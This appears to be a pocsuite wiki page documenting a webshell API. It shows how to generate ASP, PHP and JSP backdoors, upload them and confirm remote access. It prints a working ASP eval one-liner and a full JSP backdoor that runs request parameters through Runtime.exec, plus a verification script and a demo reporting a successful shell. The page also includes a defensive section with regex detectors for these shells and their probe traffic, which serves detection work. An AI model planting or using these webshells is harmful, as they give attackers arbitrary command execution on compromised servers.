How to use the webshell api

Vex Woo edited this page Jul 14, 2016 · 1 revision

This document describes how to use the webshell API.

How to generate a new shell

To generate a new shell, import the library first. The following example uses the library from a Python interactive shell.

>>> from pocsuite.api.webshell import Webshell
>>> ws = Webshell()
>>> ws.asp()
('<%eval request("26VXKVZPHplzblhZ")%>', 'Response.Write(Replace("<T>","T","26VXKVZPHplzblhZ"))', '<26VXKVZPHplzblhZ>')

If you want a custom password, for example "helloworld":

>>> from pocsuite.api.webshell import Webshell
>>> ws = Webshell()
>>> ws.password = "helloworld"   # set a shell password
>>> ws.asp()

  • To generate an ASP shell, run ws.asp().
  • To generate an ASPX shell, run ws.aspx().
  • To generate a PHP shell, run ws.php().
  • To generate a JSP shell, run ws.jsp().

ws.asp() returns a tuple of three items: (backdoor, flag_code, flag_match)

backdoor, flag_code, flag_match = ws.asp()

  • backdoor = '<%eval request("26VXKVZPHplzblhZ")%>'
  • flag_code = 'Response.Write(Replace("<T>","T","26VXKVZPHplzblhZ"))'
  • flag_match = '<26VXKVZPHplzblhZ>'

How to check whether a shell is available

    1. Upload a shell to the remote server.
    2. Send flag_code to the shell.
    3. Match the shell response against flag_match.

You can also verify a shell with has_shell, for example:

    import requests

    def has_shell(self, url, password, flag_code, flag_match):
        """Check if a shell is available.

        param: url, a shell url
        param: password, shell password
        param: flag_code, code for the shell to execute
        param: flag_match, flag expected in the response
        """
        try:
            # the shell reads the code from the POST parameter named after the password
            resp = requests.post(url, data={password: flag_code}, timeout=15)
            if resp and flag_match in resp.content:
                return True
        except (requests.ConnectionError, requests.Timeout):
            pass

        return False

has_shell takes four parameters:

  • url, a backdoor shell url
  • password, the shell password
  • flag_code, the code the shell executes (ASP, PHP, JSP, ...)
  • flag_match, the flag that must appear in the response once flag_code has executed
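The three-step check above has a defensive mirror image: the same backdoor formats and the same flag_code/flag_match exchange are what an operator on the receiving end can look for. The following is an added example, not pocsuite code, that scans files at rest for the shell patterns shown on this page and scans POST bodies for the has_shell probe, correlating a probe with its "<password>" echo to tell a dead probe from a live shell. The sample files and traffic are constructed; the assumption that the JSP flag code is the literal "debug" is taken from bk.jsp's echo branch rather than from the API itself.

```python
"""Added example (not pocsuite code): detection logic for the webshell and
verification-probe formats documented on this page.  Sample files, request
bodies and responses below are constructed for the demo."""
import re
from urllib.parse import parse_qs

# At-rest signatures, taken from the shell formats shown on this page.
FILE_SIGNATURES = {
    # ASP one-liner: <%eval request("<password>")%>
    "asp_eval_request": re.compile(r'<%\s*eval\s+request\("([^"]+)"\)\s*%>', re.I),
    # bk.jsp style: a request parameter handed straight to Runtime.exec
    "jsp_param_to_exec": re.compile(
        r'getParameter\("([^"]+)"\)[\s\S]{0,400}?Runtime\.getRuntime\(\)\.exec\('),
    # the flag echo the JSP shell carries: "<T>".replace("T","<password>")
    "jsp_flag_echo": re.compile(r'"<T>"\.replace\("T",\s*"([^"]+)"\)'),
}

# In-transit signatures: the value has_shell() posts under the password key.
PROBE_SIGNATURES = {
    "asp_flag_probe": re.compile(
        r'Response\.Write\(Replace\("<T>","T","([^"]+)"\)\)', re.I),
    # assumption: the JSP flag code is the literal "debug" (bk.jsp's echo branch)
    "jsp_debug_probe": re.compile(r'^debug$'),
}


def scan_file(path, content):
    """Return [(signature, password_or_token, path)] for webshell patterns at rest."""
    hits = []
    for name, rx in FILE_SIGNATURES.items():
        for m in rx.finditer(content):
            hits.append((name, m.group(1), path))
    return hits


def scan_probe(body):
    """Decode a urlencoded POST body and return [(signature, password)] for
    flag_code probes.  The form key is the shell password, so it is the token."""
    hits = []
    for key, values in parse_qs(body).items():
        for value in values:
            for name, rx in PROBE_SIGNATURES.items():
                if rx.search(value):
                    hits.append((name, key))
    return hits


def probe_succeeded(body, response):
    """True when a detected probe's flag_match ("<password>") appears in the
    response, i.e. the shell answered and is live (not just being probed)."""
    return any("<%s>" % pw in response for _, pw in scan_probe(body))


# --- constructed samples -------------------------------------------------
SAMPLE_FILES = {
    "/var/www/bk.jsp": ('<%String cmd = request.getParameter("helloworld");'
                        'if (cmd != null && "debug".equals(cmd)) '
                        'out.println("<T>".replace("T","helloworld"));'
                        'else if (cmd != null) { Process p = Runtime.getRuntime().exec(cmd); }%>'),
    "/var/www/index.asp": '<%eval request("26VXKVZPHplzblhZ")%>',
    "/var/www/hello.jsp": '<%@ page language="java" %><html><body>Hello</body></html>',
}
SAMPLE_TRAFFIC = [  # (POST body as requests.post(data=...) encodes it, response body)
    ('26VXKVZPHplzblhZ=Response.Write%28Replace%28%22%3CT%3E%22%2C%22T%22%2C'
     '%2226VXKVZPHplzblhZ%22%29%29', '<26VXKVZPHplzblhZ>'),
    ('helloworld=debug', '<helloworld>\n'),
    ('helloworld=debug', '<html>404</html>'),   # probe against a missing shell
    ('user=alice&mode=debug', 'ok'),            # benign "debug" value, no echo
]


def report():
    """Run both detectors over the constructed samples: (file hits, live-shell bodies)."""
    file_hits = [h for p, c in SAMPLE_FILES.items() for h in scan_file(p, c)]
    live = [body for body, resp in SAMPLE_TRAFFIC if probe_succeeded(body, resp)]
    return file_hits, live


if __name__ == "__main__":
    hits, live = report()
    for sig, token, path in hits:
        print("[file] %s  %s  token=%s" % (path, sig, token))
    for body in live:
        print("[live] probe answered: %s" % body[:40])
```

The "debug" probe on its own is a weak signal, as the benign `mode=debug` sample shows; the response correlation in probe_succeeded is what separates a generic debug flag from a working shell, and the at-rest signatures are what find the file regardless of whether anyone has probed it yet.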

Demo

If you have the chance, upload the following backdoor as bk.jsp:

<%@ page import="java.util.*,java.io.*" %>
<%@ page import="java.io.*"%>
<%@ page import="java.util.*"%>
<%
String cmd = request.getParameter("helloworld");
if (cmd != null && "debug".equals(cmd))
    out.println("<T>".replace("T","helloworld"));
else if (cmd != null && !"".equals(cmd))
{
    Process p = Runtime.getRuntime().exec(cmd);
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null)
    {
        out.println(disr);
        disr = dis.readLine();
    }
}
%>

Now we can write a simple Python script to verify the shell.

"""
Copyright (c) 2014-2016 pocsuite developers (https://seebug.org)
See the file 'docs/COPYING' for copying permission
"""

from pocsuite.api.webshell import Webshell


def test_jsp_backdoor():
    # Notice: this only checks backdoors created by the Webshell class

    # exploit the target, and upload the webshell backdoor
    # ......

    url = raw_input('[*] JSP backdoor-url: ')
    ws = Webshell()
    ws.password = raw_input('[*] backdoor-password: ')
    backdoor, flag_code, flag_match = ws.jsp()

    if ws.has_shell(url, ws.password, flag_code, flag_match):
        print('[+] get shell successfully.')
    else:
        print('[-] wish you good chance next time')


if __name__ == "__main__":
    test_jsp_backdoor()

Run the Python script and enter the backdoor URL and password when prompted.

$ python test_jsp.py
[*] JSP backdoor-url: http://192.168.206.133:8080/bk.jsp
[*] backdoor-password: helloworld
[+] get shell successfully.